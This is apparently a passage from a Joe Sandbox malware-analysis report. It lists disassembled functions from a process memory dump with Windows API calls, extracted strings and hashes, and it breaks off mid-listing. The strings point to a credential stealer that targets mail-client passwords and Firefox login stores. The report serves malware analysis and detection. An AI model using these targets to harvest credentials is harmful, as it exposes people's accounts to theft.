                                                                                                                                                                                          • Opcode ID: d04dcaea7970b63fee6828c7dcfe30098fc49b177350675b76886810d8c329c2
                                                                                                                                                                                          • Instruction ID: 01ace8319ffdb9fe87aab8cc910760b0be55d28e69d7af66dfccc1b3ad16f9ad
                                                                                                                                                                                          • Opcode Fuzzy Hash: d04dcaea7970b63fee6828c7dcfe30098fc49b177350675b76886810d8c329c2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 815163B540161CEBEF20DF91DC85ADD7BACAF04318F50846BFA08A6142D7BD9584CF98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004027B0 Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040285B
                                                                                                                                                                                            • Part of subcall function 00402994: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029C5
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402895
                                                                                                                                                                                            • Part of subcall function 00402994: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029F3
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040296D
                                                                                                                                                                                            • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                          • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                          • API String ID: 1497257669-167382505
                                                                                                                                                                                          • Opcode ID: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
                                                                                                                                                                                          • Instruction ID: 24fe9e335227be75b4da69fc4be99485a809f42695e36ab36f90f83f1315ab2f
                                                                                                                                                                                          • Opcode Fuzzy Hash: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
                                                                                                                                                                                          • Instruction Fuzzy Hash: 22514DB150060C9BEF25EF61DC85ADD7BA8FF04308F50802BF924661A2DBB99958CF48
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040F5B8 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 0040F600
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0040F618
                                                                                                                                                                                          • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040F637
                                                                                                                                                                                          • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040F644
                                                                                                                                                                                          • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040F64D
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F675
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F695
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F6B3
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F6CC
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F6EA
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F703
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 0040F70B
                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040F730
                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040F766
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F7BD
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0040F7CB
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040F7FA
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040F81C
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040F887
                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040F8A0
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0040F8AA
                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 0040F8B1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • {Unknown}, xrefs: 0040F67A
                                                                                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040F881
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                          • API String ID: 1428123949-3474136107
                                                                                                                                                                                          • Opcode ID: b9341adbc2cd016ad37feae7563ea95aa4c33f034ac246c3141dbd5b744c5ef9
                                                                                                                                                                                          • Instruction ID: eaf6f4841f79e9ca67ab0c8a61f7093b44a411cbafad24e33deb6097971d8b5c
                                                                                                                                                                                          • Opcode Fuzzy Hash: b9341adbc2cd016ad37feae7563ea95aa4c33f034ac246c3141dbd5b744c5ef9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4271B576404344BFEB31ABA0DC41EDB7B9CFB94345F00443AF644A25A1DB399D18CB6A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                          • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EE,00451398), ref: 00401273
                                                                                                                                                                                          • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2998058495-0
                                                                                                                                                                                          • Opcode ID: 0f9c4242ba45eb06dd3dfa1dd6db45fade88f32ef90b46f4d12f3d9a9e08a6d1
                                                                                                                                                                                          • Instruction ID: cf74e5707885198988a29297af0a26d915b41f86d4ff93bb74c60bb1bb3fb963
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f9c4242ba45eb06dd3dfa1dd6db45fade88f32ef90b46f4d12f3d9a9e08a6d1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 04618B35800208EBDF12AFA0DD85BAE7FA5BB04305F1481B6F904BA2F2C7B59950DF58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B94B Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00408DE1: LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                                                            • Part of subcall function 00408DE1: sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 0040BA7E
                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BAB1
                                                                                                                                                                                          • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BAC7
                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BB27
                                                                                                                                                                                          • LoadIconA.USER32(00000066,00000000), ref: 0040BB96
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040BBEE
                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,0044551F), ref: 0040BC03
                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040BC29
                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(004518C0), ref: 0040BC42
                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,004518C0), ref: 0040BC52
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040BC59
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040BC67
                                                                                                                                                                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BCC3
                                                                                                                                                                                            • Part of subcall function 00404B82: strlen.MSVCRT ref: 00404B9F
                                                                                                                                                                                            • Part of subcall function 00404B82: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404BC3
                                                                                                                                                                                          • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BD0E
                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BD21
                                                                                                                                                                                          • memset.MSVCRT ref: 0040BD36
                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 0040BD5A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                          • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                          • API String ID: 2303586283-933021314
                                                                                                                                                                                          • Opcode ID: bc2ea265da4b9d7fbf42eb82516b20c9e5d99f5c25abf20ff2f7a7fba55c6b61
                                                                                                                                                                                          • Instruction ID: a3034197930a53117d85b49231bdaaa03d04473d70278c5121b5a691f959c143
                                                                                                                                                                                          • Opcode Fuzzy Hash: bc2ea265da4b9d7fbf42eb82516b20c9e5d99f5c25abf20ff2f7a7fba55c6b61
                                                                                                                                                                                          • Instruction Fuzzy Hash: 13C1E0B1644788FFEB16DF64CC45BDABBA5FF14304F00016AFA44AB292C7B59904CB99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004109F8 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                          • API String ID: 633282248-1996832678
                                                                                                                                                                                          • Opcode ID: d48ae4295fbb277336b7674ab4026529653ef1736987acc8de4e4bffa9c8da66
                                                                                                                                                                                          • Instruction ID: 7c6bf41bc1280a1bc88d4c6d4cc59bc6a86d5934fc3475aca932ea250c86fdc0
                                                                                                                                                                                          • Opcode Fuzzy Hash: d48ae4295fbb277336b7674ab4026529653ef1736987acc8de4e4bffa9c8da66
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E31E7B2805324BEFB14EA54DD42EDEB76CAF11354F20415FF214A2182DBBC9ED48A9D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040A6AF Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                          • API String ID: 710961058-601624466
                                                                                                                                                                                          • Opcode ID: 6b5a2a585f50ca3eac413cecb2812d02d42192bb924b4e36303969acff340374
                                                                                                                                                                                          • Instruction ID: 74eb9a4e80b6148bc8e6745fd37c56fddd23ac0c0a2d0b32ddfd32f18a43723b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b5a2a585f50ca3eac413cecb2812d02d42192bb924b4e36303969acff340374
                                                                                                                                                                                          • Instruction Fuzzy Hash: BC61B232900214AFEF14EF64CC81EDE7B79EF05314F10419AF905AB1D2DB749A55CB55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410B15 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                          • API String ID: 3402215030-3842416460
                                                                                                                                                                                          • Opcode ID: 17ed6d14846e4c5c10a4de3d65ab3a3dc687bb0adce687871bc2f7fa502a4f2e
                                                                                                                                                                                          • Instruction ID: 369df5ceca9bdb9f61db2c44a96b4e719fee50907ea6fa1c749cf0cc9e3d70a7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 17ed6d14846e4c5c10a4de3d65ab3a3dc687bb0adce687871bc2f7fa502a4f2e
                                                                                                                                                                                          • Instruction Fuzzy Hash: CC4176B684011DAEEB11EE54DC41FEB776CAF55305F0401EBB608E2142E7789F988FA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00441A6C Relevance: 27.4, APIs: 7, Strings: 11, Instructions: 375COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                          • String ID: %s mode not allowed: %s$BINARY$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                          • API String ID: 231171946-1411472696
                                                                                                                                                                                          • Opcode ID: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
                                                                                                                                                                                          • Instruction ID: 52e3131474fa5b42b7a716d11f9a5693575ad96a685679239bae0d8a086cc604
                                                                                                                                                                                          • Opcode Fuzzy Hash: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6ED13571D40209AAFF24CF99C8807EFBBB1AF15349F24405FE84197361E3789AC68B59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040C12B Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 110stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                          • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$lD
                                                                                                                                                                                          • API String ID: 1012775001-1916105108
                                                                                                                                                                                          • Opcode ID: 122b63003726a974bfadc130288c83bc1cbd12b8fd6105304b92718d22d06189
                                                                                                                                                                                          • Instruction ID: 0f0ca2c9629047d536013ad0a00a476c63862c7e4230734d296e8a5f64e20069
                                                                                                                                                                                          • Opcode Fuzzy Hash: 122b63003726a974bfadc130288c83bc1cbd12b8fd6105304b92718d22d06189
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41415A72940118ABDB20DB54CC88FDAB7BCAB59300F4541EAF50DE7192DA74AA858FA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040EA92 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 166stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004078B8: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040EAAB,?,?,?,?), ref: 004078D1
                                                                                                                                                                                            • Part of subcall function 004078B8: CloseHandle.KERNEL32(00000000,?,?,?), ref: 004078FD
                                                                                                                                                                                            • Part of subcall function 004045BD: ??3@YAXPAX@Z.MSVCRT ref: 004045C4
                                                                                                                                                                                            • Part of subcall function 00406DD3: _mbscpy.MSVCRT ref: 00406DD8
                                                                                                                                                                                            • Part of subcall function 00406DD3: strrchr.MSVCRT ref: 00406DE0
                                                                                                                                                                                            • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D80B
                                                                                                                                                                                            • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D81F
                                                                                                                                                                                            • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D833
                                                                                                                                                                                            • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D900
                                                                                                                                                                                            • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D960
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EAF0
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EAFE
                                                                                                                                                                                          • memset.MSVCRT ref: 0040EB3F
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EB4E
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EB5C
                                                                                                                                                                                          • memset.MSVCRT ref: 0040EB9D
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EBAC
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EBBA
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040EC68
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040EC83
                                                                                                                                                                                            • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                            • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_strcmpistrrchr
                                                                                                                                                                                          • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                          • API String ID: 3884059725-3138536805
                                                                                                                                                                                          • Opcode ID: c5b9952702cbd755305f6f4c2c58a42ef73f51976a5d7d3736a15114e020422c
                                                                                                                                                                                          • Instruction ID: df88ffc6541641ac30fc10f5b0fca58fec5c07c4b1c9a15943a758993f488c50
                                                                                                                                                                                          • Opcode Fuzzy Hash: c5b9952702cbd755305f6f4c2c58a42ef73f51976a5d7d3736a15114e020422c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D512971508209AEE714EB62DC85BDAB7ECAF11305F10057BE145E20C2EF79B6648B99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040CAFA Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _strcmpi
                                                                                                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                          • API String ID: 1439213657-1959339147
                                                                                                                                                                                          • Opcode ID: 77925ccb47b99d7184ab421125f296c84d7d33a23461460fa00f3fd3e52541e8
                                                                                                                                                                                          • Instruction ID: 4795e8c1a20e30d0c9bbc9b6431cc8fe1bf434ed6b151c21ba544f3180274443
                                                                                                                                                                                          • Opcode Fuzzy Hash: 77925ccb47b99d7184ab421125f296c84d7d33a23461460fa00f3fd3e52541e8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 89012C6328A71168F93822A63C07F931A88CBD2B3BF32021FFA04E40C4EE5D9014946E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00443AD1 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00443AF6
                                                                                                                                                                                            • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                                                                                                                                                                          • strlen.MSVCRT ref: 00443B12
                                                                                                                                                                                          • memset.MSVCRT ref: 00443B4C
                                                                                                                                                                                          • memset.MSVCRT ref: 00443B60
                                                                                                                                                                                          • memset.MSVCRT ref: 00443B74
                                                                                                                                                                                          • memset.MSVCRT ref: 00443B9A
                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443BD1
                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443C0D
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443C1F
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00443CF6
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443D27
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443D39
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                          • String ID: salu
                                                                                                                                                                                          • API String ID: 3691931180-4177317985
                                                                                                                                                                                          • Opcode ID: cfd6af14ea326c76b81993dcf2b8da589751f80de7e5c424798678831997877e
                                                                                                                                                                                          • Instruction ID: ac1bd25895dca9443f5d295c1451dfd6054ecd25aeec11951aea85171a240119
                                                                                                                                                                                          • Opcode Fuzzy Hash: cfd6af14ea326c76b81993dcf2b8da589751f80de7e5c424798678831997877e
                                                                                                                                                                                          • Instruction Fuzzy Hash: E1715F7290011DAADB10EFA5CC81ADEB7BDBF08348F1405BAF648E7191DB749B488F95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040F9AC Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(psapi.dll,?,0040F791), ref: 0040F9BF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040F9D8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040F9E9
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040F9FA
